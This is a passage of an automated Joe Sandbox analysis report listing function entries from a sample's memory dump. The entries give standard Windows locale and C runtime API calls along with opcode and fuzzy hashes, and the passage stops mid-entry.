                                                                                                                                • Associated: 00000000.00000002.1475602439.0000000000EBD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_e90000_random.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: ErrorLast$InfoLocale
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 3736152602-0
                                                                                                                                • Opcode ID: ea7a671ef0dced179ee8e835ce1210126e203554fa539968872507f854190160
                                                                                                                                • Instruction ID: 9ba4ca25c785704c1186231bbc74d4064b80b85ca1e63dd46929098d400bbd98
                                                                                                                                • Opcode Fuzzy Hash: ea7a671ef0dced179ee8e835ce1210126e203554fa539968872507f854190160
                                                                                                                                • Instruction Fuzzy Hash: DA219871501206ABDF289B39DC82ABB73E8EF49314B10117AFD01EA145EB74EE409791
                                                                                                                                APIs
                                                                                                                                  • Part of subcall function 00E9E783: GetLastError.KERNEL32(00000000,?,00EA0AB9), ref: 00E9E787
                                                                                                                                  • Part of subcall function 00E9E783: SetLastError.KERNEL32(00000000,?,?,00000028,00E9B9D2), ref: 00E9E829
                                                                                                                                • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00EA3125
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.1475418873.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.1475354922.0000000000E90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1475462669.0000000000EAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1475490521.0000000000EB5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1475515640.0000000000EB6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1475546223.0000000000EB8000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1475574324.0000000000EBA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1475602439.0000000000EBD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_e90000_random.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: ErrorLast$InfoLocale
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 3736152602-0
                                                                                                                                • Opcode ID: af245c363526e54bd2c5d53f8a283746497af64f4fb9e2f6933a991af092947a
                                                                                                                                • Instruction ID: 1bf144ad28b8b5bafc34cf92b72ffc79b8cf68759c53f1dfd27f08b0bd11c90c
                                                                                                                                • Opcode Fuzzy Hash: af245c363526e54bd2c5d53f8a283746497af64f4fb9e2f6933a991af092947a
                                                                                                                                • Instruction Fuzzy Hash: B811E932611216ABDB14DB78DC42ABA77ECEF5A314B10127AF601EB241EB74FE048790
                                                                                                                                APIs
                                                                                                                                  • Part of subcall function 00E9E783: GetLastError.KERNEL32(00000000,?,00EA0AB9), ref: 00E9E787
                                                                                                                                  • Part of subcall function 00E9E783: SetLastError.KERNEL32(00000000,?,?,00000028,00E9B9D2), ref: 00E9E829
                                                                                                                                • EnumSystemLocalesW.KERNEL32(00EA2CFF,00000001,00000000,?,-00000050,?,00EA2AEF,00000000,-00000002,00000000,?,00000055,?), ref: 00EA2CD6
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.1475418873.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.1475354922.0000000000E90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1475462669.0000000000EAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1475490521.0000000000EB5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1475515640.0000000000EB6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1475546223.0000000000EB8000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1475574324.0000000000EBA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1475602439.0000000000EBD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_e90000_random.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: ErrorLast$EnumLocalesSystem
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 2417226690-0
                                                                                                                                • Opcode ID: ec05e47c0a1962dd7482b540a19ff7799bc1664c5c6330b79853587d4a0091f8
                                                                                                                                • Instruction ID: 21428e7145765e470bc1f559c3047ea73703d518a01e2c58c98b0b302143a9d2
                                                                                                                                • Opcode Fuzzy Hash: ec05e47c0a1962dd7482b540a19ff7799bc1664c5c6330b79853587d4a0091f8
                                                                                                                                • Instruction Fuzzy Hash: 5911253B2003015FDB18AF3DC8916BABB92FF84328B18442CEA46ABB40D371B942C740
                                                                                                                                APIs
                                                                                                                                  • Part of subcall function 00E9E783: GetLastError.KERNEL32(00000000,?,00EA0AB9), ref: 00E9E787
                                                                                                                                  • Part of subcall function 00E9E783: SetLastError.KERNEL32(00000000,?,?,00000028,00E9B9D2), ref: 00E9E829
                                                                                                                                • GetLocaleInfoW.KERNEL32(?,20000001,?,00000002,?,00000000,?,?,00EA2F1B,00000000,00000000,?), ref: 00EA32AA
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.1475418873.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.1475354922.0000000000E90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1475462669.0000000000EAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1475490521.0000000000EB5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1475515640.0000000000EB6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1475546223.0000000000EB8000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1475574324.0000000000EBA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1475602439.0000000000EBD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_e90000_random.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: ErrorLast$InfoLocale
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 3736152602-0
                                                                                                                                • Opcode ID: 70532915c5967007bc37b2d0cdd5c7a89d120efe56645013564b820a80e10525
                                                                                                                                • Instruction ID: a60c934b74907a527869688391355476fea0d2ee62191955777d8a8b6e0d0995
                                                                                                                                • Opcode Fuzzy Hash: 70532915c5967007bc37b2d0cdd5c7a89d120efe56645013564b820a80e10525
                                                                                                                                • Instruction Fuzzy Hash: 34012632600112BFDB185A34C806BFA3B54DB45B18F25052AFC12BB180EA71FF41C6E4
                                                                                                                                APIs
                                                                                                                                  • Part of subcall function 00E9E783: GetLastError.KERNEL32(00000000,?,00EA0AB9), ref: 00E9E787
                                                                                                                                  • Part of subcall function 00E9E783: SetLastError.KERNEL32(00000000,?,?,00000028,00E9B9D2), ref: 00E9E829
                                                                                                                                • EnumSystemLocalesW.KERNEL32(00EA2FB1,00000001,?,?,-00000050,?,00EA2AB7,-00000050,-00000002,00000000,?,00000055,?,-00000050,?,?), ref: 00EA2F9C
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.1475418873.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.1475354922.0000000000E90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1475462669.0000000000EAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1475490521.0000000000EB5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1475515640.0000000000EB6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1475546223.0000000000EB8000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1475574324.0000000000EBA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1475602439.0000000000EBD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_e90000_random.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: ErrorLast$EnumLocalesSystem
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 2417226690-0
                                                                                                                                • Opcode ID: 56e960a47367261b7d1f9cfbb0c31cc2cf4474593effca69b0127d92bbbb8133
                                                                                                                                • Instruction ID: d490db967f8b034cb27b53ff09a441a7ab5fe728a79e264d5784ceb22cceb828
                                                                                                                                • Opcode Fuzzy Hash: 56e960a47367261b7d1f9cfbb0c31cc2cf4474593effca69b0127d92bbbb8133
                                                                                                                                • Instruction Fuzzy Hash: B0F0F63A3043045FDB145F399881A7A7BA1EF85768B05842DFA457F680C7B1AC42C650
                                                                                                                                APIs
                                                                                                                                  • Part of subcall function 00E9B750: EnterCriticalSection.KERNEL32(-00023A67,?,00E98F5A,00000000,00EB44D8,0000000C,00E98F13,?,?,00E9F83A,?,?,00E9E921,00000001,00000364,00E931E1), ref: 00E9B75F
                                                                                                                                • EnumSystemLocalesW.KERNEL32(00E9F70A,00000001,00EB4928,0000000C,00E9F118,-00000050), ref: 00E9F74F
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.1475418873.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.1475354922.0000000000E90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1475462669.0000000000EAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1475490521.0000000000EB5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1475515640.0000000000EB6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1475546223.0000000000EB8000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1475574324.0000000000EBA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1475602439.0000000000EBD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_e90000_random.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: CriticalEnterEnumLocalesSectionSystem
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 1272433827-0
                                                                                                                                • Opcode ID: b7f7d909ca7cb492029f22994b62c5d535e49209971f6950e9a5c0d8d4cbf7ae
                                                                                                                                • Instruction ID: 1711db31b5a0f6a6072f4c863b529489e047e105c6213d255d7637758f3851af
                                                                                                                                • Opcode Fuzzy Hash: b7f7d909ca7cb492029f22994b62c5d535e49209971f6950e9a5c0d8d4cbf7ae
                                                                                                                                • Instruction Fuzzy Hash: 56F0EC76A14304DFDB01DFA9E842B9E77F0EB45721F10526AE415EB2A1CB7959058F80
                                                                                                                                APIs
                                                                                                                                  • Part of subcall function 00E9E783: GetLastError.KERNEL32(00000000,?,00EA0AB9), ref: 00E9E787
                                                                                                                                  • Part of subcall function 00E9E783: SetLastError.KERNEL32(00000000,?,?,00000028,00E9B9D2), ref: 00E9E829
                                                                                                                                • EnumSystemLocalesW.KERNEL32(00EA30D1,00000001,?,?,?,00EA2B11,-00000050,-00000002,00000000,?,00000055,?,-00000050,?,?,?), ref: 00EA30BD
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.1475418873.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.1475354922.0000000000E90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1475462669.0000000000EAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1475490521.0000000000EB5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1475515640.0000000000EB6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1475546223.0000000000EB8000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1475574324.0000000000EBA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1475602439.0000000000EBD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_e90000_random.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: ErrorLast$EnumLocalesSystem
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 2417226690-0
                                                                                                                                • Opcode ID: 313b5aafe44d7883fa41ac96c04c58b9ff17da320ae5507b6c64337c976cbc03
                                                                                                                                • Instruction ID: 43371b51d8b43e68b637296993eeec9d947d155657dc621b123ba421e93dff80
                                                                                                                                • Opcode Fuzzy Hash: 313b5aafe44d7883fa41ac96c04c58b9ff17da320ae5507b6c64337c976cbc03
                                                                                                                                • Instruction Fuzzy Hash: BEF0E53A7003095BCB04AF3AD88566ABF95EFC6754B074059FA059F251C672AA82C790
                                                                                                                                APIs
                                                                                                                                • GetLocaleInfoW.KERNEL32(00000000,?,00000000,?,-00000050,?,00000000,?,00E9A4BC,?,20001004,00000000,00000002,?,?,00E993CE), ref: 00E9F250
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.1475418873.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.1475354922.0000000000E90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1475462669.0000000000EAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1475490521.0000000000EB5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1475515640.0000000000EB6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1475546223.0000000000EB8000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1475574324.0000000000EBA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1475602439.0000000000EBD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_e90000_random.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: InfoLocale
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 2299586839-0
                                                                                                                                • Opcode ID: ef62fc98e7f8805c9b6fe10a897ef71136e0890eeed295d6ae6e693ba302c8f3
                                                                                                                                • Instruction ID: 835fe19060c18124e5ba9488de16120b4624c0de51525cd8c4c24c15bed2407a
                                                                                                                                • Opcode Fuzzy Hash: ef62fc98e7f8805c9b6fe10a897ef71136e0890eeed295d6ae6e693ba302c8f3
                                                                                                                                • Instruction Fuzzy Hash: E6E01A36500228BBCF126F61DC06AAE3E55EF44761F004521FD05B5262CB719920AAD5
                                                                                                                                APIs
                                                                                                                                • SetUnhandledExceptionFilter.KERNEL32(Function_00005135), ref: 00E95019
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.1475418873.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.1475354922.0000000000E90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1475462669.0000000000EAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1475490521.0000000000EB5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1475515640.0000000000EB6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1475546223.0000000000EB8000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1475574324.0000000000EBA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1475602439.0000000000EBD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_e90000_random.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: ExceptionFilterUnhandled
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 3192549508-0
                                                                                                                                • Opcode ID: 82a2127655e103d9e4f49055889a76e264547d9bc7adbe9613ec10318368b8b8
                                                                                                                                • Instruction ID: da457ebaa162098be828822464db79ef9fcae92dc9af58b295d14a1f82ed7693
                                                                                                                                • Opcode Fuzzy Hash: 82a2127655e103d9e4f49055889a76e264547d9bc7adbe9613ec10318368b8b8
                                                                                                                                • Instruction Fuzzy Hash:
                                                                                                                                APIs
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.1475418873.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.1475354922.0000000000E90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1475462669.0000000000EAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1475490521.0000000000EB5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1475515640.0000000000EB6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1475546223.0000000000EB8000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1475574324.0000000000EBA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1475602439.0000000000EBD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_e90000_random.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: HeapProcess
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 54951025-0
                                                                                                                                • Opcode ID: 60fe3bb1730e8b0c48e7f8803ad3b5d7740251543b2f709a10c20ea3ab37693d
                                                                                                                                • Instruction ID: 25ab865662dbb62f9044aeba92bd4bb6972a0bb8f4315d455140ee3ea5fd2732
                                                                                                                                • Opcode Fuzzy Hash: 60fe3bb1730e8b0c48e7f8803ad3b5d7740251543b2f709a10c20ea3ab37693d
                                                                                                                                • Instruction Fuzzy Hash: D5A012306011009F43008F33790561A3A9857401803044114A000D0120D72480445F00
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.1475418873.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.1475354922.0000000000E90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1475462669.0000000000EAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1475490521.0000000000EB5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1475515640.0000000000EB6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1475546223.0000000000EB8000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1475574324.0000000000EBA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1475602439.0000000000EBD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_e90000_random.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 5f0e134041470e9fe284de6385fc1cd4d990d422bbc9f06d2e93a1de301e933c
                                                                                                                                • Instruction ID: aab1e81e6bef16e0bd795dad0c35bc6f56f3e4c79100e62f6e2dfa973fd690e2
                                                                                                                                • Opcode Fuzzy Hash: 5f0e134041470e9fe284de6385fc1cd4d990d422bbc9f06d2e93a1de301e933c
                                                                                                                                • Instruction Fuzzy Hash: 71118E32314562079B6C9E289CE503B7B47D7C729832462BDC4229F6D1E533CC43C294
                                                                                                                                APIs
                                                                                                                                • GetCPInfo.KERNEL32(015BFE18,015BFE18,00000000,7FFFFFFF,?,00EAA20D,015BFE18,015BFE18,00000000,015BFE18,?,?,?,?,015BFE18,00000000), ref: 00EAA2C8
                                                                                                                                • __alloca_probe_16.LIBCMT ref: 00EAA383
                                                                                                                                • __alloca_probe_16.LIBCMT ref: 00EAA412
                                                                                                                                • __freea.LIBCMT ref: 00EAA45D
                                                                                                                                • __freea.LIBCMT ref: 00EAA463
                                                                                                                                • __freea.LIBCMT ref: 00EAA499
                                                                                                                                • __freea.LIBCMT ref: 00EAA49F
                                                                                                                                • __freea.LIBCMT ref: 00EAA4AF
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.1475418873.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.1475354922.0000000000E90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1475462669.0000000000EAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1475490521.0000000000EB5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1475515640.0000000000EB6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1475546223.0000000000EB8000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1475574324.0000000000EBA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1475602439.0000000000EBD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_e90000_random.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: __freea$__alloca_probe_16$Info
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 127012223-0
                                                                                                                                • Opcode ID: ea0638559798fde9a7cf04c651c632bc600b1c5daa0bcef602a5c44ca33199bd
                                                                                                                                • Instruction ID: b62c0d69541431b774c3614b55ab18430e1a3cd8f9d136f1a8897c06bbe00f82
                                                                                                                                • Opcode Fuzzy Hash: ea0638559798fde9a7cf04c651c632bc600b1c5daa0bcef602a5c44ca33199bd
                                                                                                                                • Instruction Fuzzy Hash: 1271E532900305ABDF219E948C45BAE7BBAAF4E314F1D6079F915BF241E775AC04C762
                                                                                                                                APIs
                                                                                                                                • MultiByteToWideChar.KERNEL32(00000000,00000001,00000001,?), ref: 00E9550C
                                                                                                                                • __alloca_probe_16.LIBCMT ref: 00E95538
                                                                                                                                • MultiByteToWideChar.KERNEL32(00000000,00000001,00000001,?,00000000,00000000), ref: 00E95577
                                                                                                                                • LCMapStringEx.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00E95594
                                                                                                                                • LCMapStringEx.KERNEL32(?,?,00000000,00000000,?,?,00000000,00000000,00000000), ref: 00E955D3
                                                                                                                                • __alloca_probe_16.LIBCMT ref: 00E955F0
                                                                                                                                • LCMapStringEx.KERNEL32(?,?,00000000,00000001,00000000,00000000,00000000,00000000,00000000), ref: 00E95632
                                                                                                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,?,00000000,00000000), ref: 00E95655
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.1475418873.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.1475354922.0000000000E90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1475462669.0000000000EAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1475490521.0000000000EB5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1475515640.0000000000EB6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1475546223.0000000000EB8000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1475574324.0000000000EBA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1475602439.0000000000EBD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_e90000_random.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: ByteCharMultiStringWide$__alloca_probe_16
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 2040435927-0
                                                                                                                                • Opcode ID: 43ceb2a6d8a1f164010e99a605fff9744941e6e0c75915023ed546a45486c89f
                                                                                                                                • Instruction ID: de1260c9f5dca4955bcc0a49c201089de08a187626aaafbe2b3372af6944ce4e
                                                                                                                                • Opcode Fuzzy Hash: 43ceb2a6d8a1f164010e99a605fff9744941e6e0c75915023ed546a45486c89f
                                                                                                                                • Instruction Fuzzy Hash: 4F51CD73600606AFEF229F65CC45FBB7BA9EF40744F65552AF905B6192DB30CD108BA0
                                                                                                                                APIs
                                                                                                                                • _ValidateLocalCookies.LIBCMT ref: 00E96217
                                                                                                                                • ___except_validate_context_record.LIBVCRUNTIME ref: 00E9621F
                                                                                                                                • _ValidateLocalCookies.LIBCMT ref: 00E962A8
                                                                                                                                • __IsNonwritableInCurrentImage.LIBCMT ref: 00E962D3
                                                                                                                                • _ValidateLocalCookies.LIBCMT ref: 00E96328
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.1475418873.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.1475354922.0000000000E90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1475462669.0000000000EAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1475490521.0000000000EB5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1475515640.0000000000EB6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1475546223.0000000000EB8000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1475574324.0000000000EBA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1475602439.0000000000EBD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_e90000_random.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                                                                                                • String ID: csm
                                                                                                                                • API String ID: 1170836740-1018135373
                                                                                                                                • Opcode ID: 3949ec2bdd15975fcc6d5c7d6969e3b69fe36250ad7e752d5bc8582b66b2ec5c
                                                                                                                                • Instruction ID: ee6a18065cb46a89085d2b42bcfa0e5755b10b81244b69c2a3c870c5b7d7c8b4
                                                                                                                                • Opcode Fuzzy Hash: 3949ec2bdd15975fcc6d5c7d6969e3b69fe36250ad7e752d5bc8582b66b2ec5c
                                                                                                                                • Instruction Fuzzy Hash: 7241C830A00214EFCF11DF69C885A9E7BF5EF45318F149556E9187B362C731EA05CB90
                                                                                                                                APIs
                                                                                                                                • FreeLibrary.KERNEL32(00000000,?,00E9F578,00E9186A,?,00000000,00E931E1,00E9186C,?,00E9F1F6,00000022,FlsSetValue,00EADFE0,8,,00E931E1), ref: 00E9F52A
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.1475418873.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.1475354922.0000000000E90000.00000002.00000001.01000000.00000003.sdmpDownload File
